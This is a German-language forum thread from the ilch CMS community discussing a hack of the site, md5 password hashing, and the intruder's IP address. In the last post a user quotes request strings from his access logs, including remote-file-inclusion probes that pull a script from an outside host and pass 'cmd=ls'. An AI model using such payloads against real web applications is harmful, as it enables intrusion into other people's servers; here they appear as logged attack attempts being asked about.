Hier kann eine Notiz zum Merk-Eintrag hinzugefügt werden (optional)
| [ 1 | 2 ] | [ Anmelden zum schreiben ] |
| Nach dem Angriff | |||
|---|---|---|---|
| oink ForenTroll
Posts: 727 |
Sorry dafür, fix ist ja in arbeit ^^
before creation there must be destruction |
||
| Revolution Mitglied
Posts: 641 |
Zitat geschrieben von kdl
Ich hoffe doch, dass die Passwörter hier auf ilch anständig gehasht sind. Ansonsten wird das sicher noch Auswirkung auf viele andere Seiten haben, da die wenigsten ein sicheres Passwort haben und sowieso überall das gleiche nutzen. Mehr als der einfache md5-hash Funktion wird hier auch nicht verwendet. Zuletzt modifiziert von Revolution am 18.12.2011 - 22:55:27 SideMAX (w)CMS 404cms 404studios.com |
||
| Ahrtas Mitglied
Posts: 1093 |
Zitat geschrieben von Chapter
Zitat geschrieben von Ahrtas Hast du was gegen Türken? Wie kommst du darauf? Mir ist lediglich aufgefallen das vermehrt türkische Hacker am Werk sind und mehr nicht! Zieh mal keine voreiligen Schlüsse ! Ich habe nur eine Frage gestellt - ich habe nichts im vorraus gesagt das du was gegen sie hast. Daher gilt dein letzter satz eher für dich oder?
Ich hoffe mal das bei ilch2.0 sowas nicht passiert da unser koernerWS drann proggrammiert - wobei google sein Portfolio wegen virenverdacht gesperrt hat xD bis er es offline genommen hat. Gutes Design ist so wenig Design wie möglich. WoW Rekrutierung für ilch | Skin-Maker |
||
| KoernerWS Ilch 2.0 Entwickler
Posts: 732 |
Mein Portfolio habe ich aber nicht selbst geschrieben gehabt. :-)
Job gesucht? - checkdomain.de sucht PHP-Entwickler! www.ilch-pluto.net/ |
||
| Ahrtas Mitglied
Posts: 1093 |
Zitat geschrieben von KoernerWS
Mein Portfolio habe ich aber nicht selbst geschrieben gehabt. :-) stimmt - habe ich aber auch nicht gesagt :-) Aber sicherlich war das kein schwerwiegender Fehler, warscheinlich ein Backdoor im Script - selbes Spiel war bei mir der Fall vor ca. einem Jahr allerdings beim osCommerce-Script. (1 Tag und google hatte kein Problem mehr) Und ich meine ja nur wenn du mit so einem "Witz" tagelang nicht klar kommst und deswegen dann dein Portfolio offline nimmst, wie sieht es dann mit dem "eigenen" CMS aus an dem du arbeitest. :/ Aber gut naja was solls is ja nicht mein Problem... ![]() Gutes Design ist so wenig Design wie möglich. WoW Rekrutierung für ilch | Skin-Maker |
||
| feldmarschall Mitglied
Posts: 35 |
Also mit der IP kann ich dienen:
46.12.239.180 Der Gute war so dumm, unter meinem Admin Account seine Hackmeldung zu veröffentlichen, während ich auf der Seite unterwegs war. Ein Blick und Abgleich auf den IP Logger und schon ist er nicht mehr völlig anonym ![]() Taucht ein Genie auf, verbrüdern sich die Dummköpfe. Jonathan Swift, englischer Schriftsteller (1667-1745) |
||
| SeToY Mitglied
Posts: 1907 |
Griechenland...
|
||
| Anarchy 90210 Mitglied
Posts: 580 |
Und wer macht sowas ohne Proxy? Bitte nochmal drüber nachdenken :p
|
||
| SeToY Mitglied
Posts: 1907 |
Zitat geschrieben von Anarchy 90210
Und wer macht sowas ohne Proxy? Bitte nochmal drüber nachdenken :p Darauf wollte ich hinaus ^^ |
||
| feldmarschall Mitglied
Posts: 35 |
Hat Google ausgespuckt:
www.youtube.com/watch?v=xDPQnNTRqUE Da das Video von 2010 ist, und dort schon das Hack Bild verwendet wurde scheint da jemand schon länger aktiv zu sein. Taucht ein Genie auf, verbrüdern sich die Dummköpfe. Jonathan Swift, englischer Schriftsteller (1667-1745) |
||
| Ahrtas Mitglied
Posts: 1093 |
kann jemand von euch etwas damit anfangen oder sagen wie es dazu kommt das dieser Link aufgerufen wird?
Zitat index.php?startseite=!S!WCRTESTINPUT000000%3C%3E%3c%3e%253c%253e!E!
Also jetzt nur das Fettgedruckte... Ich hab vor einiger Zeit ein Counter-Script gebastelt das die Seitenaufrufe zählt und die dazugehörige URL speichert die aufgerufen wurde und mir die Ergebnisse in der ilch-Statistik anzeigt. Jetzt wurde aber dieser Anhängsel bei mehreren Seiten mitdrangehängt also z.B. auch bei kontakt und impressum - nur bei selbst erstellte Textseiten. Dinge wie z.B.: Zitat index.php?Npage=-1&content_dir=http://62.141.58.186/google.txt%00&cmd=ls
und Zitat index.php?_CONFIG[files][functions_page]=http://62.141.58.186/google.txt
wurden auch aufgezeichnet. Wenn man z.B. die darin vorkommende IP aufruft kommt man auf die Seite von "Au Pair Ocean" - eine Seite mit irgendwelchen Gastfamilien whatever. Wollte es nur mal posten falls es mit einem (Hack-)Versuch zusammenhängen könnte oder von euch jemand etwas damit anfangen kann... Wie gesagt ist mir eben in meiner Statistik aufgefallen und sah sie auch erst nach dem Angriff hier bei ilch. Gutes Design ist so wenig Design wie möglich. WoW Rekrutierung für ilch | Skin-Maker |
||
| [ 1 | 2 ] | [ Anmelden zum schreiben ] |